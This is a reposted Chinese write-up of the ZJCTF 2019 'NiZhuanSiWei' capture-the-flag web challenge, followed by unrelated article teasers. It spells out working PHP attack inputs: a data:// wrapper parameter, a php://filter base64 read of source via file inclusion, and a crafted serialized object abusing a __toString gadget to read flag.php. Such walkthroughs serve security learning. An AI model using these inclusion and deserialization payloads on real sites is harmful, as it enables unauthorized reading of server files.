[ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]NiZhuanSiWei

news/2024/11/7 11:42:38/文章来源:https://blog.csdn.net/2301_80148821/article/details/143471728

[ZJCTF 2019]NiZhuanSiWei

审题

看到可以传入file，text，和password三个参数。

知识点

php伪协议，反序列化

解题

传入text，看到有file_get_content函数，这个函数表示读取$text文件里的值，返回字符串。

所以要传入text的为一个文件值，所以使用data协议写入参数。
```
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
```
看到include_once，是文件包含，使用php://filter伪协议将useless.php中的内容读取出来
```
file=php://filter/convert.base64-encode/resource=useless.php
```

读出的内容为

<?php  class Flag{  //flag.php  public $file;  public function __tostring(){  if(isset($this->file)){  echo file_get_contents($this->file); echo "<br>";return ("U R SO CLOSE !///COME ON PLZ");}  }  
}  
?>

传入password，看到反序列化，

构造
<?phpclass Flag{  public $file='flag.php';}$a=new Flag;echo serialize($a) ;
?>

传入得到flag。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.xdnf.cn/news/5797.html

如若内容造成侵权/违法违规/事实不符，请联系一条长河网进行投诉反馈，一经查实，立即删除！

相关文章

Transformer究竟是什么？预训练又指什么？BERT

Transformer究竟是什么？预训练又指什么？BERT

目录 Transformer究竟是什么？预训练又指什么？ BERT的影响力 Transformer究竟是什么？ Transformer是一种基于自注意力机制（Self-Attention Mechanism）的神经网络架构，它最初是为解决机器翻译等序列到序列（Seq2Seq）任务而设计的。与传统的循环神经网络（RNN）或卷…

阅读更多...

阿里云对象存储OSS

阿里云对象存储OSS

Alibaba Cloud OSS Alibaba Cloud OSS: 阿里云对象存储服务（Object Storage Service，简称 OSS），是阿里云提供的海量、安全、低成本、高可靠的云存储服务。您可以在任何应用、任何时间、任何地点存储和访问任意类型的数据。 1.引…

阅读更多...

element plus中修改el-table的样式

element plus中修改el-table的样式

文章目录前情提要相关环境package.jsonvue代码结果方式一直接看代码方式二直接看代码前情提要因为项目中用到el-table的时候，需要将el-table表格的样式进行修改，将整个表格的背景颜色从白色变成透明，使得表格变得透明之后，展…

阅读更多...

HTML前端页面设计静态网站

HTML前端页面设计静态网站

浅浅分享一下前端作业，大佬轻喷~ <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>一个网…

阅读更多...

tauri开发中如果取消了默认的菜单项，复制黏贴撤销等功能也就没有了，解决办法

tauri开发中如果取消了默认的菜单项，复制黏贴撤销等功能也就没有了，解决办法

取消默认的菜单项：清除tauri默认的菜单项，让顶部的菜单menu不显示-CSDN博客就是通过配置空菜单，让菜单不显示，但是这个引发的问题就是复制黏贴撤销等功能也就没有了，解决办法： 新增加编辑下的子菜单&…

阅读更多...

02 高效调优：Oracle内存体系的精细化管理实践

02 高效调优：Oracle内存体系的精细化管理实践

文章目录高效调优：Oracle内存体系的精细化管理实践一、Oracle内存体系的核心组件1.1 系统全局区（SGA）1.2 程序全局区（PGA） 二、各组件的交互关系2.1 Buffer Cache与磁盘I/O2.2 Shared Pool与SQL执行2.3 PGA与会话管理…

阅读更多...

Qt中的Model与View 3：从样例出发理解QStringListModel和QListView

Qt中的Model与View 3：从样例出发理解QStringListModel和QListView

目录 Ui文件设计如下： 初始化窗口这里，就是一经典的例子你可以看到，我们的环境变量是一个经典的List列表，其中承载的就是我们的字符串。我们现在来仿照着搞一个： Ui文件设计如下： 我们下面来逐一演示用…

阅读更多...

【简信CRM-注册安全分析报告】

【简信CRM-注册安全分析报告】

前言由于网站注册入口容易被黑客攻击，存在如下安全问题： 暴力破解密码，造成用户信息泄露短信盗刷的安全问题，影响业务及导致用户投诉带来经济损失，尤其是后付费客户，风险巨大，造成亏损无底洞…

阅读更多...

Python 三维图表绘制指南

Python 三维图表绘制指南

Python 三维图表绘制指南在数据可视化中，三维图表可以更直观地展示数据之间的关系，尤其是当数据具有多个维度时。Python 提供了多个库来绘制三维图表，其中最常用的就是 Matplotlib。本文将介绍如何使用 Matplotlib 绘制三维图表&#xff0c…

阅读更多...

粒子群优化双向深度学习！PSO-BiTCN-BiGRU-Attention多输入单输出回归预测

粒子群优化双向深度学习！PSO-BiTCN-BiGRU-Attention多输入单输出回归预测

粒子群优化双向深度学习！PSO-BiTCN-BiGRU-Attention多输入单输出回归预测目录粒子群优化双向深度学习！PSO-BiTCN-BiGRU-Attention多输入单输出回归预测效果一览基本介绍程序设计参考资料效果一览基本介绍 1.Matlab实现PSO-BiTCN-BiGRU-Attention粒子…

阅读更多...

智能离线语音识别不灵敏？如何改善和提升识别率？

智能离线语音识别不灵敏？如何改善和提升识别率？

前言有用户反馈离线语音识别不灵敏，跟着笔者一起分析原因吧。笔者知识能力有限，难免会误，还请大家批评指正。 1 影响离线语音识别的因素笔者分析离线语音识别不灵敏的原因有以下几点 1.1 运行硬件的算力限制由于离线语音识别在本地MCU…

阅读更多...

7.qsqlquerymodel 与 qtableview使用

7.qsqlquerymodel 与 qtableview使用

目录 qtableview 委托QStyledItemDelegateQAbstractItemDelegateCheckBoxItemDelegate使用qtableview控制列宽，行高，隐藏拖拽行列 qtableview 委托 //设置单元格委托 void setItemDelegate(QAbstractItemDelegate *delegate); QAbstractItemDelegate *it…

阅读更多...

加入广告联盟有什么条件吗？

加入广告联盟有什么条件吗？

加入广告联盟往往并非是一件轻而易举的事情，而是需要满足一系列特定的条件。这些条件的确会因不同的广告联盟而存在显著的差异，然而，以下所列举的是一些在众多广告联盟中较为常见的加入条件。首先，内容合规是至关重要的一点。发…

阅读更多...

实时计算 Flash – 兼容 Flink 的新一代向量化流计算引擎

实时计算 Flash – 兼容 Flink 的新一代向量化流计算引擎

摘要：本文整理自阿里云智能集团研究员、开源大数据平台负责人王峰（莫问）老师在云栖大会的开源大数据专场上的分享。主要有以下几个内容： 1. Apache Flink 已经成为业界流计算事实标准 2. Flash 向量化流计算引擎核心技术解读 3. F…

阅读更多...

springboot《计算机网络》在线考试系统-计算机设计毕业源码22248

springboot《计算机网络》在线考试系统-计算机设计毕业源码22248

摘要计算机网络课程是计算机科学与技术、信息技术及相关专业的一门重要课程。然而，在传统的教育模式下，计算机网络课程的考核方式多以纸质试卷为主，这种方式存在诸多弊端。一方面，试卷的编制、印刷、分发、收缴等环节耗时耗力&am…

阅读更多...

【K8S系列】Kubernetes 中 Service 更改未生效的故障排查与解决方案【已解决】

【K8S系列】Kubernetes 中 Service 更改未生效的故障排查与解决方案【已解决】

在 Kubernetes 中，Service 是实现 Pod 之间通信的核心组件。当您对 Service 进行更改（如修改端口或选择器）时，有时可能会发现这些更改未能生效，导致服务无法正常工作。本文将详细描述这一问题，并提供故障排…

阅读更多...

【C++】AVL树

【C++】AVL树

🔥个人主页🔥：孤寂大仙V 🌈收录专栏🌈：C从小白到高手 🌹往期回顾🌹：【C】STL----map和set 🔖 流水不争，争的是滔滔不息 AVL树通过维护树的平衡来确…

阅读更多...

用Puppeteer点击与数据爬取：实现动态网页交互

用Puppeteer点击与数据爬取：实现动态网页交互

用Puppeteer与代理IP抓取51job招聘信息：动态网页交互与数据分析引言在数据采集领域，传统的静态网页爬虫方式难以应对动态加载的网页内容。动态网页通常依赖JavaScript加载数据，用户需要与页面交互才能触发内容显示。因此，我们…

阅读更多...

砥砺十年风雨路，向新而行创新程丨怿星科技十周年庆典回顾

砥砺十年风雨路，向新而行创新程丨怿星科技十周年庆典回顾

10月24日，是一年中的第256天，也是程序员节，同时也是怿星的生日。2014年到2024年，年华似水匆匆一瞥，多少岁月轻描淡写，怿星人欢聚一堂，共同为怿星科技的十周年庆生！ 01.回忆往昔&…

阅读更多...

【vue-pdf】简单封装pdf预览组件

【vue-pdf】简单封装pdf预览组件

【vue-pdf】简单封装pdf预览组件在Vue中使用vue-pdf来展示PDF文件，首先需要安装vue-pdf： npm i vue-pdf或者 yarn add vue-pdf然后在Vue组件中引入并使用vue-pdf： /** * 描述: pdf预览组件 * 作者: xingyue * 创建时间: 2024-11-05 14:27…

阅读更多...

最新文章